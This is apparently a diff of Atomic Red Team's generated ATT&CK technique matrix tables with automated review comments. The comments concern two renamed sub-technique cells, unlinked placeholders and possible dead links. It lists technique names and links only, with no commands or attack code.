| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
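Review bot: the renamed Discovery cell on the replaced row (Wi-Fi Discovery becoming System Network Configuration Discovery: Wi-Fi Discovery) now carries its parent technique, but the other unlinked sub-technique cells in this hunk still do not, for example DHCP Spoofing, which appears twice on the last context row under both Credential Access and Collection, and VDSO Hijacking, Stripped Payloads, Time Based Evasion and Web Portal Capture. If the generator takes display names from the ATT&CK data this is an upstream rename and the other cells will follow when that data changes; if the name was patched by hand, apply the prefix to the whole row in one pass so a reader can tell which parent technique an unlinked cell belongs to. The cell itself still points at the generic CONTRIBUTE A TEST wiki link, so this hunk changes no navigation.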
+2 -2
@@ -14,7 +14,7 @@
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Unsecured Credentials](../../T1552/T1552.md) | Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Unsecured Credentials](../../T1552/T1552.md) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
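Review bot: the Discovery cell renamed on this row stays a CONTRIBUTE A TEST placeholder on this matrix while the same commit links the identical cell to ../../T1016.002/T1016.002.md on other matrices, so confirm that the platform filter, and not a missing supported_platforms entry in the new atomic, is what keeps it unlinked here. A technique that is linked on one matrix and unlinked on another in the same change is the usual symptom of a test whose platform list was left incomplete, and a one-line fix in the atomic YAML is cheaper than a second regeneration later.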
@@ -35,7 +35,7 @@
| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | TCC Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
| | | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [System Time Discovery](../../T1124/T1124.md) | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
| | | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Subvert Trust Controls: Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [System Time Discovery](../../T1124/T1124.md) | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | | | | | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | | | | | | Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
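Review bot: the Defense Evasion cell on the replaced row gains its parent prefix (Subvert Trust Controls: Code Signing Policy Modification) but remains an unlinked CONTRIBUTE A TEST placeholder with no technique ID anywhere in the cell, so a contributor reading this matrix has to infer T1553.006 from the name alone. Consider having the generator include the ATT&CK ID in unlinked cells, as the linked cells already expose it through their path (e.g. ../../T1124/T1124.md for System Time Discovery on the same row), so that the rename is not the only hint of which atomic is missing for this platform.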
+2 -2
@@ -17,7 +17,7 @@
| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [Network Share Discovery](../../T1135/T1135.md) | Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Rootkit](../../T1014/T1014.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Information Discovery](../../T1082/T1082.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Exec Into Container](../../T1609/T1609.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Local System](../../T1005/T1005.md) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Exec Into Container](../../T1609/T1609.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Local System](../../T1005/T1005.md) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Application Window Discovery](../../T1010/T1010.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Archive Collected Data](../../T1560/T1560.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
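Review bot: the new link ../../T1016.002/T1016.002.md in the Discovery column of the replaced row only resolves if the generated T1016.002/T1016.002.md is committed in this same change; a matrix row updated ahead of its technique page is a dead link on the rendered site, so verify that file is in the commit's file list before merging. The rest of the row is byte-identical to the removed line, which is expected from a whole-row regeneration but means the single changed cell has to be found by eye.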
@@ -70,7 +70,7 @@
| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Container Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable or Modify Linux Audit System](../../T1562.012/T1562.012.md) | | | | | | | |
| | | [Create Account: Cloud Account](../../T1136.003/T1136.003.md) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rogue Domain Controller](../../T1207/T1207.md) | | | | | | | |
| | | [Account Manipulation](../../T1098/T1098.md) | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Account Manipulation](../../T1098/T1098.md) | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | [Subvert Trust Controls: Code Signing Policy Modification](../../T1553.006/T1553.006.md) | | | | | | | |
| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | | | | | | | |
| | | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution](../../T1546/T1546.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
| | | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | | | | | | | |
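Review bot: same dead-link check for ../../T1553.006/T1553.006.md added in the Defense Evasion column of this row; the link is only correct if the T1553.006 technique page is generated in this commit. Separately, because each row is a single line of twelve tactic cells, a one-cell change surfaces as a full-line replacement in every matrix that carries the technique; emitting one cell per line, or generating the tables from a per-technique list that is diffed instead, would let a reviewer see the actual delta rather than re-read the whole row.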
+2 -2
@@ -15,7 +15,7 @@
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Network Share Discovery](../../T1135/T1135.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Office Application Startup](../../T1137/T1137.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [System Information Discovery](../../T1082/T1082.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication](../../T1559/T1559.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Data from Local System](../../T1005/T1005.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
